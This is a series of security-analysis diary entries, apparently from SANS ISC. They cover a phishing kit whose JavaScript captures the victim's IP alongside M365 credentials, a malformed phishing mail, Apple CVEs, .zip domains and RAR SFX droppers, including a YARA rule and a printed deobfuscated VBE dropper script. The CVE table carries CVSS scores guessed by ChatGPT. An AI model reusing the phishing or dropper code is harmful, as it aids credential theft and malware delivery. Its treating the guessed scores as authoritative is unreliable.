It's a .NET assembly: 5c5f55987a79e29a3bc46aeeb78209331d6cdbb4d1dde7f24a0b41ae51b5de8f.
Let's take a look at the second payload, using -p 2:
That one too is a .NET assembly: 5f5b1e4a6cb96f0611a8374e504cee8ceb7dc59dedf0f4059fd93dcd8315699c.
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com
Phishing Kit Collecting Victim's IP Address, (Sat, May 20th)
While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called "PROFORMA INVOICE.shtml". Right now, nothing special, emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:
The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:
<input type="hidden" name="ip" id="hIP">
This means that a variable called "ip" will be submitted with the form at the same time as the credentials. While checking deeper, there was some obfuscated JavaScript code further down in the code:
<script>
const getip = async () => {
  const payl = await postData("https://api.ipify.org/?format=json", {}, "GET");
  document.getElementById("hIP").value = payl.ip;
  return payl.ip;
}
getip();
async function postData(url = '', data = {}, method="POST") {
  const response = await fetch(url, {
    method,
    mode: 'cors',
    cache: 'no-cache',
    headers: { 'Content-Type': 'application/json' },
    body: (method.toLowerCase() === "post") ? JSON.stringify(data) : null
  });
  return response.json(); // parses JSON response into native JavaScript objects
}
</script>
The line in red (document.getElementById("hIP").value = payl.ip;) assigns the victim's public IP address to hIP, which will be exfiltrated with the credentials.
Note that this piece of JavaScript is a perfect example of how to contact an API and extract data from the JSON response!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
When the Phisher Messes Up With Encoding, (Fri, May 19th)
A reader contacted us (thank you, Scott) to share an interesting phishing email. We are always looking for fresh meat, so don't hesitate to share your samples with us! I had a look at the EML file provided by Scott, and it indeed looked weird.
When you open the mail in Outlook, it looks like this:
Your first reflex could be to think that this is a phishing campaign targeting Chinese people. If we look a bit deeper, we see that the document lacks any "format" (paragraphs, carriage returns, ...), and there are "emoticons" here and there. This definitely looks like an encoding problem.
If you check the raw EML file, there is this piece of code at the beginning of the mail body:
<=00m=00e=00t=00a=00 =00h=00t=00t=00p=00-=00e=00q=00u=00i=00v=00=3D=00"=00C= =00o=00n=00t=00e=00n=00t=00-=00T=00y=00p=00e=00"=00 =00c=00o=00n=00t=00e=00= n=00t=00=3D=00"=00t=00e=00x=00t=00/=00h=00t=00m=00l=00;=00 =00c=00h=00a=00r= =00s=00e=00t=00=3D=00u=00t=00f=00-=001=006=00"=00>=00<html><head><meta http= -equiv=3D"Content-Type" content=3D"text/html; charset=3Dunicode"> =20 <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> <title></title>= </head>=20 <body>
Export the body and open it in a text editor, and you will get:
As you can see, the attacker messed up the encoding, and Outlook cannot display the mail body correctly. Here is what should be displayed:
Note that the attackers not only messed up with the encoding, they also messed up the variable replacement with correct values ("[EMail]", "[Date_short]", ...).
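What the "=00 after every character" pattern above tells you is that the first part of the body is UTF-16LE text, quoted-printable encoded, glued onto plain ASCII HTML. The following added Python example (written for this page, not a tool from the diary) detects that pattern after QP decoding and decodes each part with its own encoding, which is the manual step an analyst performs to see what should have been displayed. The sample body is constructed in the same shape as the one quoted above, not the real mail.

```python
import quopri


def looks_like_utf16le(data, probe=64):
    """True when most odd-position bytes in the first `probe` bytes are NUL:
    the '=00 after every character' pattern seen in the raw EML body."""
    sample = data[:probe]
    if len(sample) < 4:
        return False
    nul_odd = sum(1 for i in range(1, len(sample), 2) if sample[i] == 0)
    return nul_odd >= (len(sample) // 2) * 0.8


def decode_mixed_body(raw_qp):
    """Quoted-printable decode, then split the body into the leading UTF-16LE run
    and the plain ASCII/UTF-8 remainder that was appended to it.
    Caveat: the split assumes the UTF-16 part is ASCII-range text (high byte
    0x00); a non-Latin character there would end the run early."""
    data = quopri.decodestring(raw_qp)
    if not looks_like_utf16le(data):
        return data.decode("utf-8", errors="replace")
    i = 0
    while i + 1 < len(data) and data[i] != 0 and data[i + 1] == 0:
        i += 2
    return data[:i].decode("utf-16-le") + data[i:].decode("utf-8", errors="replace")


def build_sample_body():
    """Constructed body shaped like the one in the diary: a UTF-16LE <meta> tag
    followed by ASCII HTML, all quoted-printable encoded. Not the real mail."""
    head = '<meta http-equiv="Content-Type" content="text/html; charset=utf-16">'
    tail = ('<html><head><meta http-equiv="Content-Type" content="text/html; charset=unicode">'
            '<title></title></head><body>Dear [EMail], your document is ready.</body></html>')
    return quopri.encodestring(head.encode("utf-16-le")) + quopri.encodestring(tail.encode("ascii"))


if __name__ == "__main__":
    print(build_sample_body().decode("ascii"))
    print(decode_mixed_body(build_sample_body()))
```

A mail client that honours the first meta tag decodes the whole body as UTF-16 and turns the ASCII tail into CJK-looking characters, which is the garbled rendering in the Outlook screenshot.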
The link points to a Java RAT stored on the Discord CDN[1]. The RAT connects to its C2 server via magicfinger[.]ddns[.]net
[1] https://bazaar.abuse.ch/sample/d7b24068f673031c8c27271bf36790f9468b8c27ec08c51a348fc08c34ff6881/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, May 19th, 2023 https://isc.sans.edu/podcastdetail/8504, (Fri, May 19th)
Apple Updates Everything, (Thu, May 18th)
Today, Apple released macOS, iOS, iPadOS, tvOS, watchOS, and Safari updates.
Three of the vulnerabilities are already exploited in the wild. Combining the three vulnerabilities, an attacker can gain complete system access as the user visits a malicious website. CVE-2023-32373 allows for arbitrary code execution as WebKit processes malicious content. CVE-2023-32409, in turn, enables breaking out of the web content sandbox, completing the full system compromise. The vulnerabilities are not indicated as "patched" for older versions of macOS, but they are covered in the Safari update, which applies the patch to older versions of macOS.
As usual, Apple's vulnerability descriptions are terse. As promised in a prior diary, I let ChatGPT "guess" the CVSS score for these updates. Let me know if you agree or not. The ratings (moderate/important/critical) are mine. ChatGPT refused to provide a CVSS score for some vulnerabilities, citing insufficient information. Let me know if you feel ChatGPT did ok or not (or whether it is worthwhile keeping these ChatGPT CVSS scores).
Release columns: Safari 16.5 | watchOS 9.5 | tvOS 16.5 | iOS 16.5 and iPadOS 16.5 | iOS 15.7.6 and iPadOS 15.7.6 | macOS Big Sur 11.7.7 | macOS Ventura 13.4 | macOS Monterey 12.6.6
Each entry lists the CVE, my rating, the ChatGPT CVSS guess and the affected component, then Apple's description and impact, then the affected-release marks (one x per affected release, count in parentheses).

CVE-2023-32402 [moderate] ChatGPT-CVSS: 4.3 | WebKit
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing web content may disclose sensitive information
Affected releases: x x x x x (5)

CVE-2023-32423 [moderate] ChatGPT-CVSS: 5.3 | WebKit
Description: A buffer overflow issue was addressed with improved memory handling.
Impact: Processing web content may disclose sensitive information
Affected releases: x x x x x (5)

CVE-2023-32409 [moderate] ChatGPT-CVSS: 8.8 *** EXPLOITED *** | WebKit
Description: The issue was addressed with improved bounds checks.
Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.
Affected releases: x x x x x (5)

CVE-2023-28204 [moderate] ChatGPT-CVSS: 7.5 *** EXPLOITED *** | WebKit
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.
Affected releases: x x x x x x (6)

CVE-2023-32373 [critical] ChatGPT-CVSS: 8.8 *** EXPLOITED *** | WebKit
Description: A use-after-free issue was addressed with improved memory management.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Affected releases: x x x x x x (6)

CVE-2023-32388 [important] ChatGPT-CVSS: N/A | Accessibility
Description: A privacy issue was addressed with improved private data redaction for log entries.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x x x x x x (6)

CVE-2023-32400 [moderate] ChatGPT-CVSS: N/A | Accessibility
Description: This issue was addressed with improved checks.
Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app
Affected releases: x x x (3)

CVE-2023-32399 [important] ChatGPT-CVSS: 4.3 | Core Location
Description: The issue was addressed with improved handling of caches.
Impact: An app may be able to read sensitive location information
Affected releases: x x x x (4)

CVE-2023-28191 [important] ChatGPT-CVSS: N/A | AppleEvents
Description: This issue was addressed with improved redaction of sensitive information.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x x x x x x (6)

CVE-2023-32417 [moderate] ChatGPT-CVSS: 4.0 | Face Gallery
Description: This issue was addressed by restricting options offered on a locked device.
Impact: An attacker with physical access to a locked Apple Watch may be able to view user photos or contacts via accessibility features
Affected releases: x (1)

CVE-2023-32392 [important] ChatGPT-CVSS: 4.3 | GeoServices
Description: A privacy issue was addressed with improved private data redaction for log entries.
Impact: An app may be able to read sensitive location information
Affected releases: x x x x x x (6)

CVE-2023-32372 [important] ChatGPT-CVSS: 5.3 | ImageIO
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing an image may result in disclosure of process memory
Affected releases: x x x x (4)

CVE-2023-32384 [critical] ChatGPT-CVSS: 7.8 | ImageIO
Description: A buffer overflow was addressed with improved bounds checking.
Impact: Processing an image may lead to arbitrary code execution
Affected releases: x x x x x x x (7)

CVE-2023-32354 [important] ChatGPT-CVSS: 7.5 | IOSurfaceAccelerator
Description: An out-of-bounds read was addressed with improved input validation.
Impact: An app may be able to disclose kernel memory
Affected releases: x x x (3)

CVE-2023-32420 [moderate] ChatGPT-CVSS: 7.5 | IOSurfaceAccelerator
Description: An out-of-bounds read was addressed with improved input validation.
Impact: An app may be able to cause unexpected system termination or read kernel memory
Affected releases: x x x x (4)

CVE-2023-27930 [important] ChatGPT-CVSS: 8.8 | Kernel
Description: A type confusion issue was addressed with improved checks.
Impact: An app may be able to execute arbitrary code with kernel privileges
Affected releases: x x x x (4)

CVE-2023-32398 [important] ChatGPT-CVSS: 8.8 | Kernel
Description: A use-after-free issue was addressed with improved memory management.
Impact: An app may be able to execute arbitrary code with kernel privileges
Affected releases: x x x x x x x (7)

CVE-2023-32413 [important] ChatGPT-CVSS: 8.8 | Kernel
Description: A race condition was addressed with improved state handling.
Impact: An app may be able to gain root privileges
Affected releases: x x x x x x x (7)

CVE-2023-32352 [important] ChatGPT-CVSS: 7.0 | LaunchServices
Description: A logic issue was addressed with improved checks.
Impact: An app may bypass Gatekeeper checks
Affected releases: x x x x x (5)

CVE-2023-32407 [important] ChatGPT-CVSS: N/A | Metal
Description: A logic issue was addressed with improved state management.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x x x x x x x (7)

CVE-2023-32368 [important] ChatGPT-CVSS: 6.5 | Model I/O
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing a 3D model may result in disclosure of process memory
Affected releases: x x x x x (5)

CVE-2023-32403 [important] ChatGPT-CVSS: 4.3 | NetworkExtension
Description: This issue was addressed with improved redaction of sensitive information.
Impact: An app may be able to read sensitive location information
Affected releases: x x x x x x x (7)

CVE-2023-32390 [moderate] ChatGPT-CVSS: 4.3 | Photos
Description: The issue was addressed with improved checks.
Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup
Affected releases: x x x (3)

CVE-2023-32357 [moderate] ChatGPT-CVSS: 7.0 | Sandbox
Description: An authorization issue was addressed with improved state management.
Impact: An app may be able to retain access to system configuration files even after its permission is revoked
Affected releases: x x x x x x (6)

CVE-2023-32391 [moderate] ChatGPT-CVSS: N/A | Shortcuts
Description: The issue was addressed with improved checks.
Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user
Affected releases: x x x x (4)

CVE-2023-32404 [important] ChatGPT-CVSS: 6.2 | Shortcuts
Description: This issue was addressed with improved entitlements.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x x x (3)

CVE-2023-32394 [moderate] ChatGPT-CVSS: 5.3 | Siri
Description: The issue was addressed with improved checks.
Impact: A person with physical access to a device may be able to view contact information from the lock screen
Affected releases: x x x x (4)

CVE-2023-32376 [important] ChatGPT-CVSS: 7.0 | StorageKit
Description: This issue was addressed with improved entitlements.
Impact: An app may be able to modify protected parts of the file system
Affected releases: x x x x (4)

CVE-2023-28202 [moderate] ChatGPT-CVSS: N/A | System Settings
Description: This issue was addressed with improved state management.
Impact: An app firewall setting may not take effect after exiting the Settings app
Affected releases: x x x x (4)

CVE-2023-32412 [moderate] ChatGPT-CVSS: 7.8 | Telephony
Description: A use-after-free issue was addressed with improved memory management.
Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution
Affected releases: x x x x x x x (7)

CVE-2023-32408 [important] ChatGPT-CVSS: 7.5 | TV App
Description: The issue was addressed with improved handling of caches.
Impact: An app may be able to read sensitive location information
Affected releases: x x x x x x (6)

CVE-2023-32389 [important] ChatGPT-CVSS: 7.5 | Wi-Fi
Description: This issue was addressed with improved redaction of sensitive information.
Impact: An app may be able to disclose kernel memory
Affected releases: x x x x (4)

CVE-2023-32411 [important] ChatGPT-CVSS: 6.5 | AppleMobileFileIntegrity
Description: This issue was addressed with improved entitlements.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x x x x x (5)

CVE-2023-32422 [moderate] ChatGPT-CVSS: 6.5 | SQLite
Description: This issue was addressed by adding additional SQLite logging restrictions.
Impact: An app may be able to access data from other apps by enabling additional SQLite logging
Affected releases: x x x (3)

CVE-2023-32415 [important] ChatGPT-CVSS: 5.3 | Weather
Description: This issue was addressed with improved redaction of sensitive information.
Impact: An app may be able to read sensitive location information
Affected releases: x x x (3)

CVE-2023-32371 [important] ChatGPT-CVSS: 6.5 | Associated Domains
Description: The issue was addressed with improved checks.
Impact: An app may be able to break out of its sandbox
Affected releases: x x (2)

CVE-2023-32419 [moderate] ChatGPT-CVSS: 8.8 | Cellular
Description: The issue was addressed with improved bounds checks.
Impact: A remote attacker may be able to cause arbitrary code execution
Affected releases: x (1)

CVE-2023-32385 [moderate] ChatGPT-CVSS: 4.3 | PDFKit
Description: A denial-of-service issue was addressed with improved memory handling.
Impact: Opening a PDF file may lead to unexpected app termination
Affected releases: x x (2)

CVE-2023-32365 [moderate] ChatGPT-CVSS: N/A | Photos
Description: The issue was addressed with improved checks.
Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication
Affected releases: x x (2)

CVE-2023-32367 [important] ChatGPT-CVSS: 7.5 | Security
Description: This issue was addressed with improved entitlements.
Impact: An app may be able to access user-sensitive data
Affected releases: x x (2)

CVE-2023-23532 [important] ChatGPT-CVSS: 7.0 | Apple Neural Engine
Description: This issue was addressed with improved checks.
Impact: An app may be able to break out of its sandbox
Affected releases: x (1)

CVE-2023-28181 [important] ChatGPT-CVSS: 9.8 | CoreCapture
Description: The issue was addressed with improved memory handling.
Impact: An app may be able to execute arbitrary code with kernel privileges
Affected releases: x x (2)

CVE-2023-32410 [important] ChatGPT-CVSS: 7.5 | IOSurface
Description: An out-of-bounds read was addressed with improved input validation.
Impact: An app may be able to leak sensitive kernel state
Affected releases: x x x x (4)

CVE-2023-27940 [moderate] ChatGPT-CVSS: 4.0 | Kernel
Description: The issue was addressed with additional permissions checks.
Impact: A sandboxed app may be able to observe system-wide network connections
Affected releases: x x x (3)

CVE-2023-32397 [important] ChatGPT-CVSS: 6.5 | Shell
Description: A logic issue was addressed with improved state management.
Impact: An app may be able to modify protected parts of the file system
Affected releases: x x x x (4)

CVE-2023-32386 [moderate] ChatGPT-CVSS: 5.0 | Contacts
Description: A privacy issue was addressed with improved handling of temporary files.
Impact: An app may be able to observe unprotected user data
Affected releases: x x x (3)

CVE-2023-32360 [moderate] ChatGPT-CVSS: 6.5 | CUPS
Description: An authentication issue was addressed with improved state management.
Impact: An unauthenticated user may be able to access recently printed documents
Affected releases: x x x (3)

CVE-2023-32387 [moderate] ChatGPT-CVSS: 8.8 | dcerpc
Description: A use-after-free issue was addressed with improved memory management.
Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution
Affected releases: x x x (3)

CVE-2023-27945 [moderate] ChatGPT-CVSS: 4.3 | Dev Tools
Description: This issue was addressed with improved entitlements.
Impact: A sandboxed app may be able to collect system logs
Affected releases: x x (2)

CVE-2023-32369 [important] ChatGPT-CVSS: 6.5 | libxpc
Description: A logic issue was addressed with improved state management.
Impact: An app may be able to modify protected parts of the file system
Affected releases: x x x (3)

CVE-2023-32405 [important] ChatGPT-CVSS: 7.8 | libxpc
Description: A logic issue was addressed with improved checks.
Impact: An app may be able to gain root privileges
Affected releases: x x x (3)

CVE-2023-32380 [critical] ChatGPT-CVSS: 8.8 | Model I/O
Description: An out-of-bounds write issue was addressed with improved bounds checking.
Impact: Processing a 3D model may lead to arbitrary code execution
Affected releases: x x x (3)

CVE-2023-32382 [important] ChatGPT-CVSS: 5.3 | Model I/O
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing a 3D model may result in disclosure of process memory
Affected releases: x x x (3)

CVE-2023-32355 [important] ChatGPT-CVSS: 7.5 | PackageKit
Description: A logic issue was addressed with improved state management.
Impact: An app may be able to modify protected parts of the file system
Affected releases: x x x (3)

CVE-2023-32395 [important] ChatGPT-CVSS: 7.0 | Perl
Description: A logic issue was addressed with improved state management.
Impact: An app may be able to modify protected parts of the file system
Affected releases: x x x (3)

CVE-2023-32414 [important] ChatGPT-CVSS: 4.0 | DesktopServices
Description: The issue was addressed with improved checks.
Impact: An app may be able to break out of its sandbox
Affected releases: x (1)

CVE-2023-32375 [important] ChatGPT-CVSS: 7.5 | Model I/O
Description: An out-of-bounds read was addressed with improved input validation.
Impact: Processing a 3D model may result in disclosure of process memory
Affected releases: x x (2)

CVE-2023-32363 [important] ChatGPT-CVSS: 0 | Screen Saver
Description: A permissions issue was addressed by removing vulnerable code and adding additional checks.
Impact: An app may be able to bypass Privacy preferences
Affected releases: x (1)

CVE-2023-23535 [important] ChatGPT-CVSS: 7.5 | ImageIO
Description: The issue was addressed with improved memory handling.
Impact: Processing a maliciously crafted image may result in disclosure of process memory
Affected releases: x (1)
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
A Quick Survey of .zip Domains: Your highest risk is running into Rick Ashley., (Thu, May 18th)
A week ago, I wrote about Google starting to offer ".zip" domains and the possible risks associated with this [1]. Earlier today, I quickly surveyed registered .zip domains to see what people are doing with them.
I found a total of 2,753 domains with content. Out of these domains, I was able to categorize 1,928. The rest are still being classified.
So far, most domains are "Parked" (1,506). This is typical for new domains displaying a registrar default page until the owner configures content. 229 of the domains are showing various errors. I classified 143 domains as harmless, meaning they link to different other pages that, as far as I can tell, do not provide malicious content. Some "harmless" sites appear registered by security companies or individuals either directing to their page or displaying messages warning about the .zip TLD issues. A few of the pages do, for example, direct to individual LinkedIn profiles.
48 domains direct to Rick Astley ("rickrolling") content or similar videos, mostly meant to annoy visitors.
So far, I only found one domain that I consider "suspect": fermwartung[.]zip ("Fernwartung" is the German word for Remote Maintenance). It directs to what looks like a legitimate company's webpage, but the download triggers some suspicious signatures on Virustotal [2]. I am unfamiliar with the company, but according to the web page, they appear to be an IT service provider. It is possible that their remote assistance tool triggers some Anti-Virus warnings.
sentineloneinstaller[.]zip appeared to be advertising Norton Anti-Virus. Currently, the website is down, so I cannot verify if it attempted to play the "fake anti-virus" game.
This is still a work in progress, and I will update this story as I can classify more domains. The classification is based on keywords, so I will surely miss something. Let me know if you find an "interesting" (malicious) .zip domain.
A couple of sites offered online compression/decompression of zip files. There is an obvious risk here that, first of all, the file's content may be leaked, and secondly, the file you get back may be altered. But this is not specific to the ".zip" TLD, and I classified these sites as "harmless" for now.
One site displayed a login form. But I suspect this was just a login form for the site's admin interface. It did not resemble a brand I recognized and only asked for a password, not a username.
[1] https://isc.sans.edu/diary/The+zip+gTLD+Risks+and+Opportunities/29838/
[2] https://www.virustotal.com/gui/file/06298771950708c66951149af0962079c260e08d9eb536a17d9c5f54c0d888a7
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
ISC Stormcast For Thursday, May 18th, 2023 https://isc.sans.edu/podcastdetail/8502, (Thu, May 18th)
Increase in Malicious RAR SFX files, (Wed, May 17th)
This isn't a new attack vector, but I've found many malicious RAR SFX files in the wild over the past few weeks. An "SFX" file is a self-extracting archive: it contains compressed files wrapped with executable code that decompresses them on the fly. The end user receives an executable (a PE file) that can be launched without the need to install a specific tool to decompress the content. Attackers have used this technique for a while and, even more interesting, the self-decompression routine can launch any executable (another executable, a script, ...)[1].
Most of the time, these files aren't detected as a known threat because the payloads (the archived files) are compressed (and sometimes encrypted too, if a password is used). But they are generally detected as "suspicious". I wrote a simple YARA rule to detect such files:
rule SelfExtractingRAR {
    meta:
        description = "Detects an SFX archive with automatic script execution"
        author = "Xavier Mertens <xmertens@isc.sans.edu>"
    strings:
        $exeHeader = "MZ"
        $rarHeader = "Rar!" wide ascii
        $sfxSignature = "SFX" wide ascii
        $sfxSetup = "Setup=" wide ascii
    condition:
        $exeHeader at 0 and $rarHeader and $sfxSignature and $sfxSetup
}
Here is an example of such an SFX file that I spotted yesterday. The file was delivered through a phishing campaign and was called "USD 1,810,500.exe", with the following SHA256: e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963[2]. A good point with such files is that you don't need to execute them to extract the content. A classic rar command will do the job:
remnux@remnux:/MalwareZoo/20230516$ rar t "USD 1,810,500.exe"

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive USD 1,810,500.exe

1ktZ3RF93vZq427h3lvsYTk434w53G56ek6xCJ
SILENT=
144k80p185MQ7FN1
sF7Yy34s49U9R76Rku09Q0L19P
Setup=wscript Update-sk.s.vbe
q2X4nb8h8ay8003mjTM3W41S2Q77ssEIDH7zXpA
Path=%homedrive%\pxbc
TDaTWZ41l2f4d80XMx97NB5C298bdY
Update=U
06646163K1p2p66F
67562az6K38H90tYJgQTx963kZWMg

Testing     vicmmge.buj          OK
Testing     uhupfsx.xml          OK
Testing     kmpxxcxmlq.docx      OK
Testing     Update-sk.s.vbe      OK
Testing     pxqic.pif            OK
Testing     fpss.msc             OK
Testing     epmtilluig.xml       OK
Testing     psxgfd.icm           OK
Testing     pprwvki.ppt          OK
Testing     qcrk.xls             OK
Testing     ppldgtbkm.xml        OK
Testing     loffd.mp3            OK
Testing     wfsdrusej.icm        OK
Testing     utmkbkhe.jpg         OK
Testing     lhuhm.docx           OK
Testing     jcftejksj.xls        OK
Testing     nkeej.xl             OK
Testing     wtnjesas.pdf         OK
Testing     riaam.txt            OK
Testing     clff.pdf             OK
Testing     rnovsgsm.txt         OK
Testing     gcprhnl.xls          OK
Testing     lhulocrs.xls         OK
Testing     bxmrh.msc            OK
Testing     xsdmudolb.xml        OK
Testing     xppwqdiutn.jpg       OK
Testing     eleuutbq.ppt         OK
Testing     cttrdjfv.xml         OK
Testing     ccgjrkh.ini          OK
Testing     lpuukd.icm           OK
Testing     eetv.exe             OK
Testing     sqtu.docx            OK
Testing     uvkmtkcrvq.icm       OK
Testing     efitdtqci.bmp        OK
Testing     ruvjtenq.mp3         OK
Testing     wucrjivio.pdf        OK
Testing     bhbeq.icm            OK
Testing     waemwttb.pdf         OK
Testing     wfhesiw.xml          OK
Testing     sxvkks.xls           OK
Testing     negbxaqdr.msc        OK
Testing     wmlpuwiwdd.ini       OK
Testing     vged.msc             OK
Testing     pmevdiqiww.ppt       OK
Testing     gwrtofbgi.mp3        OK
Testing     kejrxfveni.jpg       OK
Testing     bnubxgq.pdf          OK
Testing     bdldxj.msc           OK
Testing     hnbfjb.icm           OK
Testing     tpshh.xml            OK
Testing     exdsgg.icm           OK
Testing     jmwnkkmc.icm         OK
Testing     bkmlgvggjq.xml       OK
Testing     mqen.bin             OK
Testing     inxwfoap.dll         OK
Testing     qxskgk.ppt           OK
Testing     etiwhseh.txt         OK
Testing     gvgbbm.mp3           OK
Testing     duacabnhh.txt        OK
Testing     blcvjevx.msc         OK
Testing     xjwwawkp.msc         OK
Testing     jfbbaim.dat          OK
Testing     xksrkjuj.exe         OK
Testing     dndafdxcs.docx       OK
Testing     cauhoxnn.bmp         OK
Testing     adtp.icm             OK
Testing     miwvkhxw.xml         OK
Testing     dtmisespef.pdf       OK
Testing     dntdl.xls            OK
Testing     pmibtqovo.bin        OK
Testing     jjbilmi.xls          OK
Testing     hspofc.xml           OK
Testing     wniu.ppt             OK
Testing     ugrjeq.xls           OK
Testing     trgwpgvg.msc         OK
Testing     meul.exe             OK
Testing     ejlmpu.dll           OK
Testing     jnjvc.xml            OK
Testing     okmsufva.ppt         OK
Testing     urgqtjbjdv.xml       OK
Testing     mbojgfvxl.ini        OK
All OK
The purpose of all these files is to make the archive look trustworthy, but most of them contain garbage data. Here are the only interesting ones:
remnux@remnux:/MalwareZoo/20230516/out$ file * | grep -v "UTF-8"
kmpxxcxmlq.docx: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
pxqic.pif:       PE32 executable (GUI) Intel 80386, for MS Windows
uhupfsx.xml:     ASCII text, with CRLF line terminators
Update-sk.s.vbe: Little-endian UTF-16 Unicode text, with CRLF line terminators
vicmmge.buj:     ASCII text, with very long lines, with no line terminators
The interesting information is returned when you test the archive (see above):
Setup=wscript Update-sk.s.vbe
Path=%homedrive%\pxbc
Files will be extracted into 'C:\pxbc' (if the victim has the rights to create it), and the script 'Update-sk.s.vbe' will be executed.
The script is nicely obfuscated. It is encoded in UTF-16 LE, and the code is padded with many comments containing a lot of Chinese characters. Here is a decoded version:
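As an added example (not code from Xavier's diary or from any tool he names), here is a Python re-implementation of the rule logic above, including YARA's "wide ascii" semantics, that also pulls the SFX script directives (Setup=, Path=, SILENT=, Update=) out of a sample when they sit in plaintext, as `rar t` showed them. The sample bytes are constructed for the demo: they are not a real PE, and the way the comment block is laid out is an assumption, not how WinRAR actually stores it.

```python
"""Triage check for RAR SFX droppers: re-implements the SelfExtractingRAR YARA
rule logic in Python and extracts SFX script directives found in plaintext.
Added example; the sample bytes below are constructed, not a real malware file."""
import re

# Strings from the YARA rule. YARA's "wide ascii" modifier means a string
# matches either as plain ASCII or as UTF-16LE (a NUL byte after each char).
RULE_STRINGS = {
    "rarHeader": "Rar!",    # RAR signature (RAR4: Rar!\x1a\x07\x00, RAR5: Rar!\x1a\x07\x01\x00)
    "sfxSignature": "SFX",
    "sfxSetup": "Setup=",   # SFX comment directive that runs a program after extraction
}


def ascii_and_wide(s: str) -> tuple[bytes, bytes]:
    """Return the two byte encodings YARA searches for under 'wide ascii'."""
    return s.encode("ascii"), s.encode("utf-16-le")


def matches_rule(data: bytes) -> dict:
    """Evaluate the rule: MZ at offset 0 and all three strings present (ascii or wide)."""
    hits = {"exeHeader": data.startswith(b"MZ")}
    for name, s in RULE_STRINGS.items():
        a, w = ascii_and_wide(s)
        hits[name] = a in data or w in data
    hits["match"] = all(hits.values())
    return hits


# SFX script directives seen in the sample above; the value runs to end of line.
SFX_DIRECTIVE = re.compile(rb"(Setup|Path|SILENT|Update)=([^\r\n\x00]*)")


def _wide_to_ascii(data: bytes, offset: int) -> bytes:
    """Decode data as UTF-16LE from `offset` (0 or 1, to cover both alignments),
    keeping ASCII only; this mirrors `iconv -c -f UTF-16LE -t ASCII`."""
    text = data[offset:].decode("utf-16-le", errors="ignore")
    return text.encode("ascii", errors="ignore")


def extract_sfx_commands(data: bytes) -> list[tuple[str, str]]:
    """Return (directive, value) pairs visible in plaintext, ASCII or UTF-16LE."""
    found: list[tuple[str, str]] = []
    for view in (data, _wide_to_ascii(data, 0), _wide_to_ascii(data, 1)):
        for m in SFX_DIRECTIVE.finditer(view):
            pair = (m.group(1).decode("ascii"),
                    m.group(2).decode("ascii", errors="replace").strip())
            if pair not in found:
                found.append(pair)
    return found


def triage(data: bytes) -> dict:
    """Rule verdict plus directives; a Setup= with a value means the archive
    launches something automatically after extraction."""
    hits = matches_rule(data)
    cmds = extract_sfx_commands(data)
    return {
        "rule_match": hits["match"],
        "commands": cmds,
        "auto_exec": [v for k, v in cmds if k == "Setup" and v],
    }


# --- constructed samples (not real files) ----------------------------------
# A fake "SFX": an MZ stub, an ASCII "SFX" marker, a RAR5 signature and a
# UTF-16LE comment block carrying the directives seen in the diary's sample.
SFX_SAMPLE = (
    b"MZ" + b"\x90" * 62
    + b"SFX\x00"
    + b"Rar!\x1a\x07\x01\x00"
    + ("SILENT=\r\nSetup=wscript Update-sk.s.vbe\r\n"
       "Path=%homedrive%\\pxbc\r\nUpdate=U\r\n").encode("utf-16-le")
)
PLAIN_EXE = b"MZ" + b"\x00" * 100                      # a PE with no archive inside
PLAIN_RAR = b"Rar!\x1a\x07\x01\x00" + b"SFX Setup=x"   # an archive, not an executable

if __name__ == "__main__":
    for name, blob in (("sfx", SFX_SAMPLE), ("exe", PLAIN_EXE), ("rar", PLAIN_RAR)):
        print(name, triage(blob))
```

The two decoding offsets matter: a UTF-16LE string that starts at an odd file offset is invisible to a single decode from offset 0, which is the same reason YARA handles "wide" matching at the byte level rather than by decoding the whole file.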
remnux@remnux://MalwareZoo/20230516/out$ iconv -c -f UTF-16LE -t ASCII Update-sk.s.vbe | grep -v "^'"
on error resume next
o_j_no
fvxnvbahlwqjenu = "kmpxxcxmlq.docx"
wckwqfuoxpx = StrReverse("fip.ciqxp")
hknghkuuktxdvfx = hotbnrfdsuedk("llehS.tpircSW")
Set obxigdixuharkko = WScript.CreateObject(hknghkuuktxdvfx )
xwduhpaha = wckwqfuoxpx + " " + fvxnvbahlwqjenu
obxigdixuharkko.Run xwduhpaha
function hotbnrfdsuedk(senlukbqxmcs)
hotbnrfdsuedk = StrReverse(senlukbqxmcs)
End function
Sub o_j_no
o_j_no = execute (StrReverse(peelS.tpircSW) + "4000")
End Sub
Sub twvrtegjxowwq(VAR)
twvrtegjxowwq = StrReverse(VAR)
End Sub
